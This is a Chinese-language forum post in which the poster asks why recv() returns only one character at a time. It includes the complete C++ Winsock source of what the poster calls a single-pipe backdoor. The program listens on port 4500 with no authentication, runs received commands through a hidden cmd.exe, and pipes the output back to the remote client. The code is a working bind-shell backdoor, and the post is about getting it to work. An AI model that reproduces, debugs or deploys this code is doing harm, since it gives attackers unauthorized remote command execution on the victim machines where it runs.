关于recv()的问题 求教

276691146

   请问什么时候recv() 会只接受一个字符就结束？？
   下面有个程序，

1. 
   
2. #include "stdafx.h"
   
3. #include <IOSTREAM.H>
   
4. #include <stdio.h>
   
5. #include <winsock2.h>
   
6. #pragma comment(lib, "ws2_32.lib")
   
7. 
   
8. int main(int argc, char* argv[])
   
9. {
   
10. char wMessage[512] = "\r\n======================== Door ========================\r\n";
    
11. //初始化socket，并监听端口
    
12. SOCKET sClient;
    
13. BYTE minorVer = 2;
    
14. BYTE majorVer = 2;
    
15. WSADATA wsaData;
    
16. WORD sockVersion = MAKEWORD(minorVer, majorVer);
    
17. if(WSAStartup(sockVersion, &wsaData) != 0)
    
18. return 0;
    
19. SOCKET sListen = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    
20. if(sListen == INVALID_SOCKET)
    
21. {
    
22. printf("socket error \n");
    
23. return 0;
    
24. }
    
25. sockaddr_in sin;
    
26. sin.sin_family = AF_INET;
    
27. sin.sin_port = htons(4500);
    
28. sin.sin_addr.S_un.S_addr = INADDR_ANY;
    
29. if(bind(sListen, (LPSOCKADDR)&sin, sizeof(sin)) == SOCKET_ERROR)
    
30. {
    
31. printf("bind error \n");
    
32. return 0;
    
33. }
    
34. if(listen(sListen, 5) == SOCKET_ERROR)
    
35. {
    
36. printf("listen error \n");
    
37. return 0;
    
38. }
    
39. //接收连接
    
40. sClient =accept(sListen,NULL,NULL);
    
41. //发送欢迎信息
    
42. send(sClient,wMessage,strlen(wMessage),0);
    
43. char rBuffer[1024] = {0};
    
44. char cmdline[256]={0};
    
45. //循环，用于接受命令，创建进程执行，并从管道中读出执行结果返回给远程主机
    
46. while(true)
    
47. {
    
48. //cmdline清零
    
49. memset(cmdline,0,256);
    
50. SECURITY_ATTRIBUTES sa;
    
51. HANDLE hRead,hWrite;
    
52. sa.nLength = sizeof(SECURITY_ATTRIBUTES);
    
53. sa.lpSecurityDescriptor = NULL;
    
54. sa.bInheritHandle = TRUE;
    
55. if (!CreatePipe(&hRead,&hWrite,&sa,0))
    
56. {
    
57. printf("CreatePipe Error");
    
58. return 0;
    
59. }
    
60. STARTUPINFO si;
    
61. PROCESS_INFORMATION pi;
    
62. si.cb = sizeof(STARTUPINFO);
    
63. GetStartupInfo(&si);
    
64. //使cmd和管道关联，注意这里和双管道相比少了si.hStdInput = hReadPipe;因为输入由带命令执行代替
    
65. si.hStdError = hWrite;
    
66. si.hStdOutput = hWrite;
    
67. si.wShowWindow = SW_HIDE;
    
68. si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
    
69. //得到系统目录
    
70. GetSystemDirectory(cmdline,sizeof(cmdline));
    
71. strcat(cmdline,"\\cmd.exe /c ");
    
72. char cmdbuff[256];
    
73. memset(cmdbuff,0,256);
    
74. 
    
75. //接受远程命令
    
76. int rLen=recv(sClient,cmdbuff,256,0);//就是这里，cmdbuff里只会有一个字符就结束了
    
77. if(rLen==SOCKET_ERROR)
    
78. return 0;
    
79. //在cmd后加入命令
    
80. strncat(cmdline,cmdbuff,strlen(cmdbuff));
    
81. //创建进程执行命令
    
82. if (!CreateProcess(NULL,cmdline,NULL,NULL,TRUE,NULL,NULL,NULL,&si,&pi))
    
83. {
    
84. printf("CreateProcess Error");
    
85. continue;
    
86. }
    
87. cout<<cmdline<<endl;
    
88. 
    
89. CloseHandle(hWrite);
    
90. DWORD dwRead;
    
91. //循环，监视管道中的返回信息，也就是执行命令后的返回信息
    
92. while(ReadFile(hRead,rBuffer,1024,&dwRead,NULL))
    
93. {
    
94. //发送执行结果
    
95. send(sClient,rBuffer,strlen(rBuffer),0);
    
96. memset(rBuffer,0,1024);
    
97. 
    
98. }
    
99. }
    
100. return 0;
     
101. }

复制代码

上面是一个关于单管道后门的程序。 但是。recv()每次只接受一个字符就结束了，。。请问这是为什么啊？？